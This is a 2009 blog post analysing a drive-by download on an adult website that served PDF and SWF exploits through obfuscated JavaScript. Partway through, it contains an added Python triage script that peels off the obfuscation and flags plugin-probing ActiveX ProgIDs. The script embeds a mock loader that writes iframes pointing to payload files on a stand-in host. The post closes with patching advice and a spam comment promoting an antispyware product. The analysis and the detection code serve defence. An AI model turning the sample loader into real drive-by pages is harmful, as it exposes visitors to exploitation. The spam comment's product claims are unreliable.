Tuesday, April 14, 2009

Adult site contains drive-by download malware

One adult site, ranked around 31K on Alexa, serves drive-by download malicious files: a PDF exploit and an SWF exploit. The malicious website has a timeout mechanism, so after a period of time it stopped serving the files, which made it harder for me to analyse the malicious files further. Deobfuscating the multiple layers to get the URL link is a tedious and time-consuming process.

From early analysis, the JS script on that adult website appears to have been altered: after unescaping, it contains a malicious link, so the malicious site's script looks like this. It uses the ActiveX objects AcroPDF.pdf and PDF.PdfCtrl to detect a PDF reader, and the ActiveX object ShockwaveFlash.ShockwaveFlash.9 to detect Flash (SWF).

Based on the code above, it shows the links to download the malicious PDF file and SWF file. Once the PDF file is opened, the JavaScript contained inside the PDF points back to the same malicious website, downloads another malicious file and injects it using shellcode.
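As an added illustration (not code from the original post, and not the site's actual script), here is a small Python triage helper that reproduces the analysis step described above: it peels the layered unescape() obfuscation off a script, then reports which of the three ActiveX ProgIDs the page probes (the PDF-versus-SWF fingerprinting) and which .pdf/.swf payload URLs surface once the layers are gone. The sample script and the example.invalid host are constructed for this example.

```python
"""
Added example (not code from the original post): peel layered unescape()
obfuscation off a JavaScript snippet and report the plugin-probing ActiveX
ProgIDs the post names plus any .pdf/.swf payload URLs that surface.
The sample script below is constructed for illustration; the real site's
script is not reproduced here.
"""
import re
from typing import Dict, List, Tuple

# ProgIDs the post says the script probes to choose between the PDF and
# SWF exploit. ProgID lookups are case-insensitive, so matching is too.
PLUGIN_PROGIDS = (
    "AcroPDF.PDF",
    "PDF.PdfCtrl",
    "ShockwaveFlash.ShockwaveFlash.9",
)

# unescape("...") / unescape('...') together with its quoted payload
UNESCAPE_CALL = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.S)
# %uXXXX first, then %XX, decoded in ONE pass like JavaScript's unescape()
ESCAPE_SEQ = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
# URLs ending in .pdf or .swf (the sample uses a constructed .invalid host)
PAYLOAD_URL = re.compile(r"""https?://[^\s'"<>]+\.(?:pdf|swf)""", re.I)


def js_unescape(s: str) -> str:
    """Single-pass equivalent of JavaScript's unescape(); a decoded '%' is
    never re-interpreted, so '%u0025%34%31' yields '%41', not 'A'."""
    return ESCAPE_SEQ.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def peel_unescape_layers(js: str, max_layers: int = 10) -> Tuple[str, int]:
    """Replace every unescape("payload") with its decoded payload, repeating
    until nothing changes. Returns (decoded text, number of layers removed)."""
    layers = 0
    for _ in range(max_layers):
        decoded = UNESCAPE_CALL.sub(lambda m: js_unescape(m.group(2)), js)
        if decoded == js:
            break
        js, layers = decoded, layers + 1
    return js, layers


def analyze(js: str) -> Dict[str, object]:
    """Decode the script and collect the indicators a triage analyst wants."""
    decoded, layers = peel_unescape_layers(js)
    lowered = decoded.lower()
    progids: List[str] = [p for p in PLUGIN_PROGIDS if p.lower() in lowered]
    urls = sorted(set(PAYLOAD_URL.findall(decoded)))
    return {
        "layers": layers,
        "progids": progids,
        "urls": urls,
        # hidden plugin fingerprinting plus hidden payload URLs is the
        # drive-by pattern the post describes
        "suspicious": layers > 0 and bool(progids) and bool(urls),
        "decoded": decoded,
    }


# --- constructed sample: the shape the post describes, not the real script ---
INNER_JS = (
    'var pdf = null, swf = null;'
    'try { pdf = new ActiveXObject("AcroPDF.PDF"); } catch (e) {'
    '  try { pdf = new ActiveXObject("PDF.PdfCtrl"); } catch (e2) {} }'
    'try { swf = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9"); } catch (e) {}'
    "if (pdf) document.write('<iframe src=\"http://example.invalid/x.pdf\"></iframe>');"
    "if (swf) document.write('<iframe src=\"http://example.invalid/x.swf\"></iframe>');"
)


def percent_encode(js: str) -> str:
    """%XX-encode every character (inner obfuscation layer, assumed form)."""
    return "".join("%%%02X" % ord(c) for c in js)


def unicode_escape_encode(js: str) -> str:
    """%uXXXX-encode every character (outer wrapping layer, assumed form)."""
    return "".join("%%u%04X" % ord(c) for c in js)


# two layers: inner script %XX-encoded, then that wrapper %uXXXX-encoded
SAMPLE = 'eval(unescape("%s"));' % unicode_escape_encode(
    'eval(unescape("%s"));' % percent_encode(INNER_JS)
)


if __name__ == "__main__":
    report = analyze(SAMPLE)
    print("layers removed :", report["layers"])
    print("plugin probes  :", ", ".join(report["progids"]))
    print("payload URLs   :", ", ".join(report["urls"]))
    print("suspicious     :", report["suspicious"])
```

Run it as a script to see the report for the constructed sample, or import `analyze()` and feed it a script captured from a page. The single-pass `js_unescape()` matters: decoding `%u0025` to `%` and then decoding again would corrupt layered payloads, and a real unescape() never does that.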

The conclusion here is: please get the latest updates for your PDF reader and Flash, and remember to switch to the latest Firefox browser with the NoScript plugin installed.

1 comment:

Cathlin said...

Recommend Search-and-destroy Antispyware to anyone.
I would like to recommend Search-and-destroy Antispyware to anyone that wants a good scan for their computer. I tried many other scanners in the past, but so far I like this one the best. It's cheaper than many of the others and it costs less. What more can you ask for? The antispyware solution from Search-and-destroy found at http://www.Search-and-destroy.com is a great option whether you use your computer for work or personal use. It will keep it clear and clean of antispyware that bogs down your PC and causes it to be sluggish and annoying.